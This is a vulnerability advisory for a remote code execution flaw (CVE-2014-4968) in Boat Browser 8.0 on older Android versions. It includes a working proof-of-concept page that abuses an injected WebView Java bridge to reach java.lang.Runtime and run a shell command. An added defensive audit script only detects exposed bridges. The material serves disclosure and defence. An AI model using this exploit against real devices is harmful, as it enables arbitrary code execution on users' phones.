Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability
Source: https://twitter.com/c0otlass Author: c0otlass Published: 2014-07-17
<!--
.:: Remote code execution vulnerability in Boat Browser ::.

Credit: c0otlass
Social contact: https://twitter.com/c0otlass
Mail: c0otlass@gmail.com
CVE reserved: 2014-4968
Time of discovery: July 14, 2014
Browser official site: http://www.boatmob.com/
Browser download link: https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
Versions affected: 8.0 and 8.0.1 tested, on Android 3.0 through 4.1.x
Risk rate: High
Vulnerability description and impact:
The browser's use of the WebView class and the WebView.addJavascriptInterface method is vulnerable: script in a remote HTML page can execute code on the Android device.
This is related to CVE-2012-6636.
Proof of concept:
//..............................................poc.html............................................
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>CreatMalTxt POC - WebView</title>
<script>
var obj;
function TestVulnerability()
{
    // Stays "not" unless an injected Java object hands back a Runtime instance.
    var temp = "not";
    var myObject = window;
    // Walk every own property of window looking for an object added through addJavascriptInterface.
    for (var name in myObject) {
        if (myObject.hasOwnProperty(name)) {
            try
            {
                temp = myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);
            }
            catch(e)
            {
                // Not a Java bridge object, or reflection is not reachable from script.
            }
        }
    }
    if (temp == "not")
    {
        document.getElementById("log").innerHTML = "this browser has been patched";
    }
    else {
        document.getElementById("log").innerHTML = "This browser is exploitable" + "<br>" + " the poc file has been created in sdcard ...<br>";
        document.getElementById("log").innerHTML += "we could see process information" + temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
    }
}
</script>
</head>
<body >
<h3>CreatMalTxt POC</h3>
<input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" />
<div id="log"></div>
</body>
</html>

<!--
Solution:
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
http://www.programering.com/a/MDM3YzMwATc.html
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

References:
http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
http://50.56.33.56/blog/?p=314
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
-->
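
A read-only version of the check the PoC performs, as an added example that is not part of the original advisory: it lists the `window` properties that expose `getClass` without calling anything on them, so a developer can audit their own WebView build. The `legacyWindow` and `annotatedWindow` objects and the name `appBridge` are constructed stand-ins; from API 17 on only methods annotated with `@JavascriptInterface` are reachable from script, which is what `annotatedWindow` models.

```javascript
// Added example, not from the original advisory. ES5 only, so it also runs
// in the old WebViews being audited.

// Returns the sorted names of properties on `root` that expose getClass, the
// reflection entry point the PoC uses. No method is invoked on the object.
function findExposedBridges(root) {
  var exposed = [];
  var names = Object.getOwnPropertyNames(root);
  for (var i = 0; i < names.length; i++) {
    var value;
    try {
      value = root[names[i]];      // some host getters throw on access
    } catch (e) {
      continue;
    }
    if (value === null || value === root) continue;   // skip window.self etc.
    if (typeof value !== 'object' && typeof value !== 'function') continue;
    try {
      // Assumption: a bridge injected before API 17 reports inherited
      // java.lang.Object methods such as getClass as defined properties.
      if (typeof value.getClass !== 'undefined') exposed.push(names[i]);
    } catch (e) {
      // access denied: treat as not exposed
    }
  }
  return exposed.sort();
}

// Summarises the audit as a single object for logging.
function auditWebView(root) {
  var bridges = findExposedBridges(root);
  return { vulnerable: bridges.length > 0, bridges: bridges };
}

// Constructed stand-ins for `window`; "appBridge" is a hypothetical name.
var legacyWindow = {
  document: {},
  appBridge: { getClass: function () { return {}; }, share: function () {} }
};
legacyWindow.self = legacyWindow;
Object.defineProperty(legacyWindow, 'flaky', {
  enumerable: true,
  get: function () { throw new Error('denied'); }
});
var annotatedWindow = { document: {}, appBridge: { share: function () {} } };

// Inside a real WebView, audit the live window object.
if (typeof window !== 'undefined') {
  console.log(JSON.stringify(auditWebView(window)));
}
```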
 